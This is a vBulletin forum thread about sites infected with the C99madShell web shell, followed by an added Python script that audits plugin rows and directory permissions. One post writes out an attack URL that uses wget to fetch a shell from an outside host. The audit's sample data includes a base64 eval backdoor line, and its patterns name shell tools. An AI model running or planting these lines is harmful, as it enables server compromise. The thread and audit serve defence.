#1
21 Jan 2009, 03:04
ryan.gottlieb (Join Date: Aug 2007; Real name: Ryan)
C99madShell v. 2.0 madnet edition

I upgraded vBulletin 3.8 from 3.7, and now whenever I try to edit subscriptions, this comes up... it's a PHP shell script....

--------------- Added 21 Jan 2009 at 03:08 ---------------

Ok... it was going back to the init.php file, and told me this line


($hook = vBulletinHook::fetch_hook('init_startup')) ? eval($hook) : false;


I commented that line out (//) and it went away....

--------------- Added 21 Jan 2009 at 03:23 ---------------

solved.... error.php

Last edited by ryan.gottlieb : 21 Jan 2009 at 03:23. Reason: Auto-Merged DoublePost
#2
21 Jan 2009, 04:04
Dismounted (Join Date: Jun 2005; Real name: Hanson)
By commenting that line, you are only disabling that hook. It hasn't fixed the hole that allowed the attacker to run the shell in the first place.
__________________
View My Modifications
29 Releases and Counting... Latest Modification: dmActivityStream - vBookie Integration (4.x)

Please do not PM me to ask for support - please use the relevant thread or forum.
#3
27 Jan 2009, 02:33
ryan.gottlieb (Join Date: Aug 2007; Real name: Ryan)
No, by SOLVED I meant I removed the script.. (The shell script)
#4
27 Jan 2009, 03:58
Dismounted (Join Date: Jun 2005; Real name: Hanson)
That still does not solve how the attacker got the file there. Unless you know that already too?
#5
23 Aug 2011, 11:50
blowy (Join Date: Jun 2011)
I am having this problem as well... When I try to edit the payments manager I get the above message:

!C99madShell v. 2.0 madnet edition!

Software: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5. PHP/5.2.13
#6
24 Aug 2011, 04:56
Marco64Th (Join Date: Aug 2011)
This is a trojan, just google for it. You should contact your host ASAP to find out how it got into your account and to remove all traces of it.
#7
24 Aug 2011, 15:01
Crad (Join Date: Sep 2009)
Um, it's not a Trojan :P

http://www.derekfountain.org/security_c99madshell.php

You've encountered the first evidence that your site has been compromised! Cheers!
#8
24 Aug 2011, 16:06
TheLastSuperman (Join Date: Sep 2008; Real name: Michael Miller Jr)

Originally Posted by Crad:
Um, it's not a Trojan :P

http://www.derekfountain.org/security_c99madshell.php

You've encountered the first evidence that your site has been compromised! Cheers!
Tomato, tomato or potato, potato, it does not matter: it's malicious and is still something you do not want to see when navigating the admincp or any other part of your site for that matter, and tbo I have no clue why you even posted that last snippet of quick wit; nothing to cheer about until you've removed it.
__________________
Anti-Spam Methods and Resources
InnovationByInstinct.com - Custom vBulletin Modifications, Styles, and Services.
Skype: innovationbyinstinct

Search - Use the search feature to find similar issues/answers.
Information - Include screenshots, copy/pasted error codes, url etc.
Fixed - Please return to your thread/post and let us know how it was fixed!
Thanks - For participating! Click the "Like" on a post if someone helped you!
#9
24 Aug 2011, 19:27
daydie (Join Date: Oct 2007)
they get the file on your server by ajax.php - they use it like forum.com/ajax.php?global=wget http://www.examplewebsite.org/c100.txt

Then they process this from here.

I would recommend vbulletin upgrading / securing the ajax.php asap

Last edited by daydie : 24 Aug 2011 at 19:32.
#10
25 Aug 2011, 03:51
Marco64Th (Join Date: Aug 2011)
Originally Posted by Crad:
Um, it's not a Trojan :P

http://www.derekfountain.org/security_c99madshell.php

You've encountered the first evidence that your site has been compromised! Cheers!
A useless discussion on semantics in my view; the poster that asked the question will understand that it is a serious security issue if I use the word "Trojan".

But how would you call an unwanted script that gives an unauthorized person backdoor access to system functions and data?
#11
29 Aug 2011, 19:53
ishare (Join Date: Jun 2006)
Right now I have exactly the same problem. Does anyone know how to solve this problem, please? I am running my own dedicated server, but since I am not good with server management, I do not have any idea what to do on the server side if it's not about removing a file or something like that...
#12
29 Aug 2011, 21:29
vbresults (Join Date: Apr 2009)
I saw this for the first time on a client's install two or so months ago. None of the vBulletin files were modified and the database was clean so I was stumped at first. It turns out this particular exploit uses vB's plugin/hook system; if you see a strange plugin (note I said plugin, not product), remove it. Then, find out how it got on there. xD

Just read a document on this exploit; bad file permission or upload script setups could allow something like this to happen.
#13
30 Aug 2011, 06:52
Fortezza (Join Date: Aug 2011)
I think Shell is malicious
#14
30 Aug 2011, 09:36
Paul M (Join Date: Sep 2004; Real name: Paul Marsden)
Originally Posted by daydie:
they get the file on your server by ajax.php - they use it like forum.com/ajax.php?global=wget http://www.examplewebsite.org/c100.txt

Then they process this from here.

I would recommend vbulletin upgrading / securing the ajax.php asap
You cannot upload files like that with ajax.php unless someone has already compromised you.

What actually happens is they use SQL injection via an unsafe modification to install a plugin on the ajax hook, then use that malicious plugin to install the file.

If your forum directory was properly secured as read only (to apache) then that wget would fail to actually save the file.
__________________


Lead Developer, vBulletin.Org & vBulletin.Com
Please do not PM me about custom work - I no longer undertake any.

Note: I will not answer support questions via e-mail or PM - please use the relevant thread or forum.
Cable Forum - DigiGuide
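Posts #12 and #14 above describe the two things a defender has to check on an affected board: the plugin rows the hook system evals from the database (vbresults saw clean files and a clean-looking database because the implant lived in the plugin table, which is exactly what the eval($hook) line quoted in post #1 executes), and whether the web server account can write into the forum directory at all (Paul's point that a read-only forum directory makes the wget fail). The following Python audit is an added example, not code from the thread, from vBulletin or from any of the posters. Assumptions not on the page: the plugin table column names (pluginid, title, hookname, phpcode, product, active) follow the vBulletin 3 schema, ajax_start is used as the hook name of the constructed sample row, the indicator patterns and all sample rows are constructed for the example, uid/gid 48 stand in for the web server account, and an in-memory SQLite table stands in for the live MySQL database.

```python
import os
import re
import sqlite3
import stat

# Indicator patterns for plugin PHP bodies (constructed for this example).
# A single hit is common in legitimate plugins, so audit_plugins() needs two
# before it flags a row; tune min_hits to your board.
SUSPICIOUS = [
    (r"\bwget\b|\bcurl\b|file_get_contents\(\s*['\"]https?://", "remote fetch"),
    (r"base64_decode\s*\(", "base64-obfuscated payload"),
    (r"\b(eval|assert|create_function)\s*\(", "dynamic code execution"),
    (r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(", "shell command execution"),
    (r"\b(file_put_contents|fwrite|fopen)\s*\(", "writes a file"),
    (r"\$_(GET|POST|REQUEST|COOKIE)\[", "reads request input"),
]


def scan_plugin_code(phpcode):
    """Return the indicator labels (in SUSPICIOUS order) that match one plugin body."""
    return [label for pattern, label in SUSPICIOUS
            if re.search(pattern, phpcode, re.IGNORECASE)]


def audit_plugins(conn, min_hits=2):
    """Return (pluginid, title, hookname, product, hits) for every plugin row
    whose phpcode matches at least min_hits indicators. Column names are
    assumed from the vBulletin 3 `plugin` table (not taken from the thread)."""
    rows = conn.execute(
        "SELECT pluginid, title, hookname, phpcode, product, active FROM plugin"
    ).fetchall()
    flagged = []
    for pluginid, title, hookname, phpcode, product, active in rows:
        hits = scan_plugin_code(phpcode or "")
        if len(hits) >= min_hits:
            flagged.append((pluginid, title, hookname, product, hits))
    return flagged


def dir_writable_by(mode, owner_uid, owner_gid, uid, gid):
    """Unix permission check: can an account with uid/gid write into a
    directory with the given st_mode/st_uid/st_gid? Owner bits win if the
    account owns it, then group bits, then 'other'."""
    if owner_uid == uid:
        return bool(mode & stat.S_IWUSR)
    if owner_gid == gid:
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)


def forum_dir_writable_by(path, uid, gid):
    """Apply dir_writable_by() to a real directory; True means a dropper
    running as that account could save a file there."""
    st = os.stat(path)
    return dir_writable_by(st.st_mode, st.st_uid, st.st_gid, uid, gid)


def build_sample_db():
    """Constructed stand-in for the plugin table: a benign plugin, a benign
    plugin that merely reads $_GET, and a backdoor planted on the ajax hook
    of the kind posts #12 and #14 describe (sample body constructed here)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE plugin (pluginid INTEGER, title TEXT, hookname TEXT, "
                 "phpcode TEXT, product TEXT, active INTEGER)")
    conn.executemany("INSERT INTO plugin VALUES (?, ?, ?, ?, ?, ?)", [
        (1, "Forum notice", "global_start",
         "$vbulletin->options['notice'] = 'hello';", "vbulletin", 1),
        (2, "ajax cache", "ajax_start",  # innocuous title, hook name assumed
         "@eval(base64_decode($_GET['global']));", "vbulletin", 1),
        (3, "Nav tweak", "global_start",
         "if ($_GET['do'] == 'foo') { $show['foo'] = true; }", "vbulletin", 1),
    ])
    return conn


if __name__ == "__main__":
    for pluginid, title, hookname, product, hits in audit_plugins(build_sample_db()):
        print(f"plugin {pluginid} '{title}' on hook {hookname} ({product}): "
              + ", ".join(hits))
    # 48 is a placeholder for the web server's uid/gid; use the real ones.
    print("forum dir writable by web server:", forum_dir_writable_by(".", 48, 48))
```

Against a live board you would replace build_sample_db() with a connection to the real database and point forum_dir_writable_by() at the forum root with the account Apache actually runs as; a flagged row is something to export and inspect before deleting, since it is also the evidence of how the implant was installed, and a writable forum root is the setting to fix regardless of what the audit finds.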
#15
31 Mar 2012, 18:31
gazza2008 (Join Date: Aug 2009)
How would I get rid of this? I've been compromised as well...

Is it in a folder in FTP, is it a CODE I can delete, etc.?
All times are GMT.